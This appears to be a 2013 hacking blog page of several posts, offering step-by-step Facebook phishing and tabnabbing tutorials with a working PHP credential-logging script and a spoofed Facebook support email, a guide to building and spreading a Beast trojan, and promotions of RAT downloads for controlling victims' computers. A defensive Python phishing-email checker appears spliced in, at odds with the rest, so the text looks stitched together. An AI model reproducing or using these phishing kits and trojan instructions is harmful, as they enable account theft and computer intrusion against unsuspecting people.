Showing posts with label Hacking. Show all posts

Saturday, November 30, 2013

Real Web Application Hacking Video Lecture by Offensive Security


Hello friends, after a long time I'm posting something on Hackingsoftwarez; I was really busy these days with pen-testing. Today I'm back with an interesting article. You might know what Offensive Security is (the creators of Backtrack, Kali Linux and the Exploit Database, and also one of the most popular penetration testing companies; they also provide professional hacking and security courses). Their courses and books are really helpful and interesting, but unfortunately you have to purchase them or apply for the hacking course. So today we'll give away some of their real web application hacking videos (lectures by Offensive Security). They are amazing and very helpful for beginners and hackers.


Is this Useful for me?

Although I don't know who you are, I bet you're here to learn hacking and security. You may have watched many hacking videos so far, but you'll really love this one from Offensive Security. Everyone wants to learn real hacking and wants to know what hacking is, but many of them fail to find sources and learning methods. But I say if you have the curiosity and passion to learn and do something, you can learn easily. I'm not here to inspire you; my job is to share articles and make your learning easier. I have written many hacking and security articles so far, but this is one of the best I'm writing. I would prefer you to watch these videos instead of doing CEH, lol, and I'm quite serious.


Am I Eligible to Watch & Understand the Lectures? What Do I Need to Know?

A good question for beginners. You must know a little bit about web application programming and hacking, at least the basics. Please watch the videos in sequence, from Part 1 to Part 4. Don't jump directly to writing exploits; it's pretty hard. Do not skip anything until you understand it. If you do not understand something, please google it; there is a ton of information.



I strongly recommend that all beginners download and understand these real web application hacking lectures (by Offensive Security). They have explained almost everything about web application hacking. Amazing for beginners to learn something new. Don't miss it; download from the links below.

How to Download All Videos

This time I have not uploaded any video to my own server; the videos are at another location. If you want to learn step by step how to download them, click here and read this short Word file with 5 easy steps to download the hacking video lectures.





Thank you for reading my post. If you like it, please share it and help us grow. If you have any kind of doubt, please feel free to comment or dare to ask.

Thursday, November 28, 2013

How to Hack Facebook Accounts by Tabnabbing?


I hope you are all aware of phishing and how it is used for stealing and hacking account passwords.

A more advanced attack compared to phishing is tabnabbing.

OK. Let's start...
                                   

Things you need for Tabnabbing: 

1. A free web hosting account - you can use 110mb.com or ripway.com

2. You should have the following files, which are required for tabnabbing.

1. Facebook.html - Fake Facebook login page (phisher)
2. login.php - Script which captures the login details of the victim
3. google.html - Standard Google page used to trick the user
4. tabnabb.js - JavaScript which is required for tabnabbing

1. First of all, download all the files and extract them using WinRAR or WinZip, then upload facebook.html, login.php and google.html to your free web hosting account.

2. Now open tabnabb.js in Notepad and search for "Enter your URL here". Replace it with the URL of the "Facebook.html" you uploaded in the previous step, then save it and upload tabnabb.js to your hosting account.

3. By now you should have successfully uploaded all four files to your hosting account.

4. Now, to check whether the hack is working, click on the google.html link and open it, then open a few new tabs. After some time you will see the Google page switched to your fake Facebook page.

5. Once the victim enters all his credentials in our fake Facebook login page and clicks login, he will be redirected to the Facebook.com/careers page to avoid suspicion.

6. To see the victim's login details, go to your hosting account, where you will see a new file "log.txt". Open it to see the victim's user ID and password.

You can use the same techniques to hack other account passwords like Paypal, Gmail, Twitter etc. But you have to use different html pages.

Good luck and happy hacking...

Monday, November 18, 2013

Polipo v1.0.4 Free Download

Polipo is a small and fast caching web proxy (a web cache, an HTTP proxy, a proxy server). While Polipo was designed to be used by one person or a small group of people, there is nothing that prevents it from being used by a larger group.

Polipo has some features that are, as far as I know, unique among currently available proxies:
                                                           

* Polipo will use HTTP/1.1 pipelining if it believes that the remote server supports it, whether the incoming requests are pipelined or come in simultaneously on multiple connections (this is more than the simple usage of persistent connections, which is done by e.g. Squid);
* Polipo will cache the initial segment of an instance if the download has been interrupted, and, if necessary, complete it later using Range requests;
* Polipo will upgrade client requests to HTTP/1.1 even if they come in as HTTP/1.0, and up- or downgrade server replies to the client's capabilities (this may involve conversion to or from the HTTP/1.1 chunked encoding);
* Polipo has complete support for IPv6 (except for scoped (link-local) addresses).
* Polipo can optionally use a technique known as Poor Man's Multiplexing to reduce latency even further.

In short, Polipo uses a plethora of techniques to make web browsing (seem) faster.



Thursday, November 14, 2013

Beast v2.07 Complete tutorial and Download

Beast is a Trojan maker. Turn off all anti-virus while in use. Let's start from the top left to the bottom right. The Host is the person you're connecting to. The Port is the open hole or backdoor to the computer which you will use to view and control their computer. The Password is the password you set to access the port. The Go-Beast button is basically the connect button, which connects your computer to the computer with the server. The Next Port button is for SIN (a different and easier backdoor).


The Start Listening button is the same as the Go-Beast button except it connects to the SIN port. The Build Server button is basically to make a program that opens that backdoor you need. When the Build Server button is clicked a new window will appear. The window will provide different options for your server. The first option button on the left is the Basic button. The Basic button will provide options for the basics of your server. Starting on the left, the SIN Port is the port or backdoor you want opened. Reverse Connection is basically saying you want to use the SIN method, which I recommend because it's a lot easier. The other method (right) is the Direct Connection method. Listen Port is the port or backdoor you want opened. The Password is the password you want to set on your port or backdoor. The Direct Connection box is basically saying yes to using the Direct Connection method, which I disregard due to the work of finding the person's IP and having to remember a password. The Injections are if you want to inject the server into a program or a process. And the Residing is where you want your server to be located. The second button down from the top is the Notifications button. This button tells you all the ways of getting keylogging info from your host and other information. The third button from the top is the Startup button, as the name says. I recommend you have them all checked. The button fourth from the top is the Anti-Virus + Firewall Kill button. This button will give you options on what anti-virus and firewalls you want killed or turned off. The button fifth from bottom is the Misc. button. It gives you options like an error message, enabling the keylogger, etc. The button sixth from the top is the Exe icon: the icon that the server will have. At the bottom of this window are Save and Load; Save is to save the current settings of the server you made. The Load button is the button to load any previous saves you saved before. The Save Server button is to make the server.
The server will then appear in the folder or area where your Beast 2.07 application is located. Back in the original window you will see many buttons from the middle right to the bottom right. These buttons are basically to do whatever you want to the computer. See their screen, interact with the screen. Make folders. Destroy, format, it never ends. Now here comes the hard part. I will only explain the SIN port method because using the Host (IP) method is time consuming and wasteful. Now let's say you made your server, you use the Reverse Connection method (SIN), and you set your port to 1234. You now have to get that server to whom you want to Troj. Now if the person you want to Trojan is a dumbass and has no anti-virus and/or firewall, you shouldn't have any problems getting the server to them. Now if your friend is not so dumb and has a firewall and/or anti-virus, you may have to encrypt it and/or bind it with another file like a picture or an MP3 file. And once you find a way to get it to whom you're Trojing, and they click on it, just type the port you set on your server, click the Start Listening button and voilà. You're in and ready to go. Start watching and controlling their computer. It may take a while for the server to pop up, but it will.

Netbus v1.7 - Download

Netbus is hacking software by Carl-Fredrik Neikter, a Swedish hacker, and was created in Delphi. This program works under Windows 95/98/Me/2000/XP and NT. Netbus first appeared in 1998 with version 1.60 and version 1.70. There are also Netbus Pro v2.01 and Netbus Pro v2.10, released in 1999. Even now, Netbus is still one of the computer security threats.


In my previous post I gave you the download link for Netbus v1.6. Here I am providing you Netbus v1.7.

Prorat Tutorial and Download


ProRat is a powerful Remote Administration Tool (RAT), or you can call it a Trojan. ProRat is written in C++ and it can work with all Windows operating systems.


Like all remote administration tools, ProRat works in a server and client format. First you have to build the server using the client software and send it to the victim. Once your victim installs the server on his system, it will send the port number and IP address to the address provided while building the server. That's it. Now you have to enter the IP and port and connect to the victim's system using the client software.

You can use ProRat either for a legal connection or for hacking purposes.


Bifrost v1.2.1 RAT - Download



Bifrost is an advanced Remote Administration Tool that allows you to remotely control computers that are behind firewalls and routers.
In this version the bypassing method has been developed further and it is again able to silently connect through most hardware and software firewalls.

Features:

Cam Capture, File Manager, File Search, Offline/Online Keylogger, Password List (protected storage, cached passwords, icq, cd keys), Polymorphic Plugin, Process List, Remote Shell, Screen Capture, System Info and Windows List.


The main target when developing Bifrost has always been: 1. Stability 2. Better fwb than most other rats 3. Easy to use.

When v1.1 was released 2.5 years ago, it would bypass all software firewalls back then. This was because of its injection technique combined with methods to avoid user and kernel level hooks (fwb+).

This has been the main focus when developing this version, so the server has been rewritten and the fwb improved further. Provided it's an XP and the user is logged in as admin, it is able to silently bypass most software firewalls.



Poison Ivy v2.3.2 RAT - Free download


Poison Ivy is in my view, the best Remote administration tool. A Remote Administration Tool (known more commonly on the Internet as a RAT) is used to remotely connect and manage a single or multiple computers with a variety of tools, such as:

* Screen/camera capture or control
* File management
* Shell control
* Computer Control
* Registry management
* Other product-specific function ( Source: Wikipedia )

It has a huge number of features that give the attacker more ease in attacking a target. It is the most widely used RAT among script kiddies as well as programmers.


It has features like password stealing, keylogging and many more...

The latest version of this RAT is "Poison Ivy v2.3.2". You can download this from the link given below. If you have any doubts regarding its use etc., feel free to ask me...

Keep visiting my site for more hacking tools and tutorials... You can find my other RATs and download them.

Shark v2.2 Remote Administration Tool



Shark v2.2 is one of the easy to use RATs. A Remote Administration Tool (known more commonly on the Internet as a RAT) is used to remotely connect and manage a single or multiple computers with a variety of tools, such as:

* Screen/camera capture or control
* File management
* Shell control
* Computer Control
* Registry management
* Other product-specific function ( Source: Wikipedia )

It has a huge number of features that give the attacker more ease in attacking a target. It is the most widely used RAT among script kiddies as well as programmers. It has features like password stealing, keylogging and many more...

The latest version of this RAT is "Shark v2.2". If you have any doubts regarding its use etc., feel free to ask me...

I will provide you its download link in a few days...

Keep visiting my site for more hacking tools and tutorials... You can find my other RATs HERE and download them.

Wednesday, November 13, 2013

Cyber Gate v1.07.5 Free Download



CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously being developed. Using CyberGate you can log the victim's passwords and can also get screenshots of his computer's screen. You can connect to multiple victims at a single time. One need not know the IP address of the victims' computers. That is the main benefit. What you have to do is spread the server file to the victims or the people whom you want to infect. There is also a file manager utility with which you can explore the data of the victim.

Turkojan v4 RAT - Download



Turkojan is one of my favorite Remote Administration tools. I personally prefer Turkojan to ProRat because in ProRat you have to find out your victim's IP address. But in the case of Turkojan the server itself lets you know whenever the victim is live on the internet.


Turkojan also has a lot of tools, similar to all the other remote administration tools.


Facebook Phishing Tutorial


Here I will show you how you can create fake facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password.

                                                             

You need 3 files Index.html, phish.php, passwords.txt to create a fake facebook login page.

To create index.html:

First of all open www.facebook.com in your web browser, from the "file" menu select "save as", type "index" as the file name and select "web page complete" from the save as menu. Once done you will have a file named "index.html" and a folder named "index_files". The folder will have several files in it; leave them as they are and open index.html in Notepad or WordPad. From the edit menu select find, type action in it and locate the following string.
action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with action="phish.php" and also change the method in the HTML from 'post' to 'get'.
Save the document.

To create phish.php:

Now open notepad type following php code in it and create phish.php.


<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Now simply create text document and rename it as passwords.txt

Now you'll need a free web hosting service that supports PHP. I suggest you to use http://www.000webhost.com/



Open the site and create an account. Once you have created your account, you login to your account and go to control panel.
In the control panel choose file manager and upload the 3 files index.html, phish.php, passwords.txt in public directory.



Now create a new directory there and name it as index_files. Now open it and upload all the files in index_files folder formed while saving facebook page to it.

Don't forget to change Chmod permissions for passwords.txt to 777. Once done make index.html your index page and make site live.

Now create a spoofed email using my Anonymous mailer, from support@facebook.com to your victim.
Sub: Invalid activity on your facebook account.
Body:
Hey (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site> normally it will be http://yourusername.somex.com/index.html
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

support@facebook.com, 
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US

If your victim is not security focused, he/she will surely fall prey to it and will log in using the phished site, handing you his password in the passwords.txt file.



Please note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.


Countermeasure:
Do not respond to any message from Facebook, whether it is legitimate or not, by clicking on links that appear in the mail. Instead, whenever you receive any mail of this type, report it to facebook.com after logging in by typing www.facebook.com in your web browser.
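
A mail-side check that complements this countermeasure, as an added example that is not part of the original post: it triages one message for the traits of the lure described above, namely a From address claiming facebook.com that fails DMARC, links that leave facebook.com, and the 48-hour suspension threat. The sample message, the mx.example.net authserv-id and the phish.example host are constructed placeholders.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample modelled on the lure in the post; mx.example.net (the
# receiving MTA) and phish.example are placeholder names, not real hosts.
SAMPLE = """\
From: Facebook Support <support@facebook.com>
To: user@example.net
Subject: Invalid activity on your facebook account.
Authentication-Results: mx.example.net; spf=fail smtp.mailfrom=facebook.com;
 dkim=none; dmarc=fail header.from=facebook.com
Content-Type: text/plain

Recently we saw some suspicious activity on your account. Please log in:
http://yourusername.phish.example/index.html
Failing to log in within next 48 hours we may suspend your account.
"""

def in_domain(host, domain):
    """True if host is the domain itself or a subdomain of it."""
    host = (host or "").lower().rstrip(".")
    return host == domain or host.endswith("." + domain)

def auth_results(msg, trusted):
    """SPF/DKIM/DMARC verdicts, read only from headers our own MTA stamped."""
    out = {}
    for value in msg.get_all("Authentication-Results", []):
        authserv, _, rest = " ".join(value.split()).partition(";")
        if authserv.strip().lower() != trusted:
            continue  # any other authserv-id can be forged by the sender
        for m in re.finditer(r"\b(spf|dkim|dmarc)=(\w+)", rest, re.I):
            out[m.group(1).lower()] = m.group(2).lower()
    return out

def body_text(msg):
    """Concatenate the decoded text parts of the message."""
    chunks = []
    for part in msg.walk():
        if part.get_content_maintype() == "text":
            raw = part.get_payload(decode=True) or b""
            chunks.append(raw.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)

def triage(raw, brand="facebook.com", trusted="mx.example.net"):
    """Return a list of findings for one raw RFC 5322 message."""
    msg = message_from_string(raw)
    body = body_text(msg)
    findings = []
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    if in_domain(from_domain, brand):
        dmarc = auth_results(msg, trusted).get("dmarc", "missing")
        if dmarc != "pass":
            findings.append(f"From claims {brand} but dmarc={dmarc}")
        hosts = {urlparse(u).hostname for u in re.findall(r"https?://[^\s<>\"']+", body)}
        for host in sorted(h for h in hosts if h and not in_domain(h, brand)):
            findings.append(f"link to {host} is outside {brand}")
    if re.search(r"within (the )?next \d+ hours|suspend your account", body, re.I):
        findings.append("urgency or suspension threat")
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Only Authentication-Results headers stamped by the receiver's own mail server are read, because a sender can prepend a forged header that claims a pass.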


Saturday, November 9, 2013

HOW TO GET FACEBOOK PROFILE ID & FACEBOOK PAGE ID


HOW TO GET YOUR PROFILE & PAGE ID ON FACEBOOK

As you know, every Facebook profile or page has a unique ID, and no one else can get to know it except you yourself, so make it more unique by knowing it!


This is one of the greatest achievements among the tricks that had been used with regard to Facebook.



Once you get to know your secret ID and the profile that is actually yours, and hence related directly to your account, you would get more and more chances of hiding, and Facebook hence can guarantee you the secrecy of your data, information and personal elements.

HOW ID COULD BE USEFUL
1 ) You can use this ID as a username in your login.

2 ) For tagging name in comment or post @[your id:]
For example 
my profile at Facebook saikiran


& many more
